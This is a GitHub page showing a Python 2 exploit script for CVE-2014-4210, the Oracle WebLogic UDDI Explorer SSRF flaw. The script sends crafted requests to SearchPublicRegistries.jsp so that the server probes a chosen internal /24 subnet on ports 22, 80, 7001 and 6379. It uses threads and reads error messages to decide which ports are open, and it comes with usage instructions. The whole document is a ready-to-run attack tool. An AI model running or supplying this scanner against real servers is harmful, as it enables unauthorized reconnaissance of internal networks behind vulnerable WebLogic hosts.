-
Notifications
You must be signed in to change notification settings - Fork 1.1k
/
Copy pathcve-2014-4210_ssrf_scan.py
89 lines (86 loc) · 3.16 KB
/
cve-2014-4210_ssrf_scan.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import sys
import time
import threading
import requests
import Queue
lock = threading.Lock()
threads = []
class MyThread(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True: # 除非确认队列中已经无任务,否则时刻保持线程在运行
try:
ip_str = self.queue.get(block=False) # 如果队列空了,直接结束线程。根据具体场景不同可能不合理,可以修改
scan(ip_str)
except Exception:
break
def scan(ip_str):
# ports = ('21','22','23','53','80','135','139','443','445','1080','1433','1521','3306','3389','4899','8080','7001','8000','6379')
ports = ('22','80','7001','6379')
for port in ports:
exp_url = "http://"+target+"/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str,port)
#print '[-] '+ip_str+':'+port
try:
response = requests.get(exp_url, timeout=3, verify=False)
#SSRF判断
re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',response.content)
#丢失连接.端口连接不上
re_sult2 = re.findall('but could not connect',response.content)
#丢失连接.端口连接不上
re_sult3 = re.findall('No route to host',response.content)
#没有路由的主机,扫描不存在
if (len(re_sult1)!=0 and (len(re_sult2)+len(re_sult3))==0):
lock.acquire()
print '[+] '+ip_str+':'+port
lock.release()
except Exception:
pass
def find_ip(ip_prefix,Thread_count):
'''
给出当前的192.168.1 ,然后扫描整个段所有地址
'''
thread_count = int(Thread_count)
queue = Queue.Queue()
print ("[*]+------------------------+")
print ("[*]+ Scanning ip and port +")
print ("[*]+------------------------+")
for i in range(1,256):
ip = '%s.%s'%(ip_prefix,i)
queue.put(ip)
for i in range(thread_count):
threads.append(MyThread(queue))
for t in threads:
try:
t.start()
except Exception as e:
print e
continue
for t in threads:
try:
t.join()
except Exception as e:
print e
continue
print ("[*]+------------------------+")
print ("[*]+ Scan completed +")
print ("[*]+------------------------+")
if __name__ == "__main__":
if len(sys.argv)!=4:
print("+----------------------------------------------------------------------+")
print("+ USE: python <filename> <target_ip:port> <scan_address> <process> +")
print("+ EXP: python cve-2014-4210_ssrf_scan.py 1.1.1.1:7001 192.168.1.0 20 +")
print("+ VER: 10.0.2,10.3.6 +")
print("+----------------------------------------------------------------------+")
sys.exit()
target = sys.argv[1]
commandargs = sys.argv[2:]
args = "".join(commandargs)
ip_prefix = '.'.join(args.split('.')[:-1])
print ip_prefix
thread_count = sys.argv[3]
find_ip(ip_prefix,thread_count)